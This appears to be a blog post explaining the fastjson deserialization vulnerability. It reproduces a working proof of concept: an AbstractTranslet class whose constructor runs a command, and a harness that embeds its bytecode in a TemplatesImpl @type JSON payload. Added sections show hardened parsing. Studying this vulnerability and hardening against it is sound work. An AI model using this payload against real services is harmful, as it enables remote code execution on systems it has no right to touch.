I had only ever had a rough understanding of this vulnerability, so I used some recent free time to study it in depth.

Java environment

```
java version "1.8.0_211"
Java(TM) SE Runtime Environment (build 1.8.0_211-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)
```

Create a User class:
```java
public class User {
    private int age;          // private, but has a public setter
    public String username;   // public field
    private String secret;    // private and has no setter: only a getter

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getUsername() {
        return username;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public String getSecret() {
        return secret;
    }

    @Override
    public String toString() {
        return this.age + "," + this.username + "," + this.secret;
    }
}
```
| Function | Effect |
|---|---|
| JSON.toJSONString(Object) | Serializes the object to JSON |
| JSON.toJSONString(Object, SerializerFeature.WriteClassName) | Serializes the object to JSON and also records which class the object belongs to |
| JSON.parse(Json) | Turns JSON back into an object (but errors when the deserialized class object has no @type) |
| JSON.parseObject(Json) | The returned object is of class com.alibaba.fastjson.JSONObject |
| JSON.parseObject(Json, Object.class) | The class of the returned object is decided by the @type in the JSON |
| JSON.parseObject(Json, User.class, Feature.SupportNonPublicField) | Also restores the private members of the class that the JSON data maps to |
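To make the table concrete, here is an added example (editor's code, not from the original post) that exercises each of the listed calls on the User class above. It assumes User lives in the default package, as on this page, and a fastjson 1.2.x build that honors @type without a whitelist, which is the behavior this post studies; on builds with autoType disabled or safeMode enabled, the calls that carry an @type throw a JSONException instead of returning an instance.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class ApiDemo {
    public static void main(String[] args) {
        User u = new User();
        u.setAge(30);
        u.setUsername("alice");
        // secret has no setter, so it stays null on this instance

        // 1. Plain serialization: fields reachable through public fields/getters,
        //    no class information is written.
        String plain = JSON.toJSONString(u);
        System.out.println("plain:  " + plain);

        // 2. WriteClassName prepends "@type":"User", i.e. the class name travels
        //    inside the JSON text.
        String typed = JSON.toJSONString(u, SerializerFeature.WriteClassName);
        System.out.println("typed:  " + typed);

        // 3. parse() sees the @type key and instantiates that class.
        Object back = JSON.parse(typed);
        System.out.println("parse() returned " + back.getClass().getName());

        // 4. parseObject(String) hands back a JSONObject view. Note that fastjson
        //    still instantiates the @type class internally first and then converts
        //    it with JSON.toJSON(), so the class named by @type is still loaded.
        JSONObject view = JSON.parseObject(typed);
        System.out.println("parseObject() keys: " + view.keySet());

        // 5. With Object.class as the target, @type alone decides the result type.
        Object chosen = JSON.parseObject(typed, Object.class);
        System.out.println("Object.class target resolved to " + chosen.getClass().getName());

        // 6. Private field without a setter (constructed input): it is only written
        //    when SupportNonPublicField is enabled; otherwise fastjson has no
        //    public setter for it and leaves it null.
        String withSecret = "{\"@type\":\"User\",\"age\":30,"
                + "\"username\":\"alice\",\"secret\":\"s3cr3t\"}";
        User noFeature = JSON.parseObject(withSecret, User.class);
        User withFeature = JSON.parseObject(withSecret, User.class,
                Feature.SupportNonPublicField);
        System.out.println("secret without feature: " + noFeature.getSecret());
        System.out.println("secret with feature:    " + withFeature.getSecret());
    }
}
```

Items 5 and 6 are the two knobs the rest of the post relies on: a target type of Object.class lets the JSON choose the class, and SupportNonPublicField lets the JSON write fields that have no setter.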
Use the exploit POC circulating online as-is:
```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

// Must extend AbstractTranslet so that TemplatesImpl accepts the class;
// the constructor body is what runs when the class is instantiated.
public class poc extends AbstractTranslet {

    public poc() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator,
                          SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers)
            throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        poc t = new poc();
    }
}
```
Compile this file, base64-encode the resulting class bytes, and let fastjson restore the object:
```java
import java.io.*;
import java.util.HashMap;
import java.util.Map;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;

public class Vultest {

    // Read a compiled .class file and return its bytes as a base64 string
    public static String readClass(String cls) {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try {
            IOUtils.copy(new FileInputStream(new File(cls)), bos);
        } catch (IOException e) {
            e.printStackTrace();
        }
        return Base64.encodeBase64String(bos.toByteArray());
    }

    public static void main(String[] args) throws UnsupportedEncodingException {
        ParserConfig config = new ParserConfig();
        String evilCode = readClass("D://code//fastjsonvul//target//classes//Poc.class");
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String text1 = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\"" + evilCode + "\"],"
                + "'_name':'a.b','_tfactory':{ },\"_outputProperties\":{ },"
                + "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
        // Object.class as the target type plus SupportNonPublicField: the two
        // conditions from the table above
        Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
    }
}
```

Set a breakpoint on exec and inspect the call stack.
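The defensive counterpart to the test above, added by the editor and not part of the original post. It assumes fastjson 1.2.68 or later for setSafeMode (setAutoTypeSupport exists from 1.2.25, where it already defaults to off) and uses a constructed JSON body whose _bytecodes entry is a plain placeholder rather than a compiled class, so nothing is ever loaded; the point is only that a hardened ParserConfig refuses the @type key before any field is touched, while ordinary input that names no class still parses.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

public class HardenedParse {

    // Constructed sample with the same shape as the payload above, but the
    // _bytecodes entry is a placeholder string, not real class bytes.
    static final String UNTRUSTED =
            "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\","
            + "\"_bytecodes\":[\"PLACEHOLDER\"],\"_name\":\"a\","
            + "\"_tfactory\":{},\"_outputProperties\":{}}";

    // Constructed honest input: the business fields, no @type.
    static final String HONEST = "{\"age\":30,\"username\":\"alice\"}";

    // ParserConfig for untrusted input: autoType off (default since 1.2.25,
    // written explicitly here) and safeMode on (1.2.68+), which makes fastjson
    // reject every @type key regardless of whitelists.
    static ParserConfig hardenedConfig() {
        ParserConfig config = new ParserConfig();
        config.setAutoTypeSupport(false);
        config.setSafeMode(true);
        return config;
    }

    // Bind untrusted JSON to the concrete business type only. Never pass
    // Object.class or Feature.SupportNonPublicField for untrusted input:
    // Object.class lets the JSON's @type choose the class, and
    // SupportNonPublicField lets the JSON write setter-less private fields
    // such as TemplatesImpl._bytecodes.
    static User parseUser(String json) {
        return JSON.parseObject(json, User.class, hardenedConfig());
    }

    // Returns true only when the input is accepted; a JSONException from the
    // @type check is the expected outcome for the payload shape above.
    static boolean accepts(String json) {
        try {
            parseUser(json);
            return true;
        } catch (JSONException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println("payload accepted? " + accepts(UNTRUSTED)); // expected: false
        System.out.println("honest accepted?  " + accepts(HONEST));    // expected: true
        System.out.println(parseUser(HONEST));
    }
}
```

For an application-wide setting use ParserConfig.getGlobalInstance().setSafeMode(true); binding to a concrete DTO and avoiding SupportNonPublicField on request bodies removes both conditions the exploit above depends on even on older builds.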
Copyright notice: "fastjson反序列化漏洞原理" (Principles of the fastjson deserialization vulnerability) is an original article by admin; please credit the source when reposting.
Last edited: 2020-7-13 08:07:00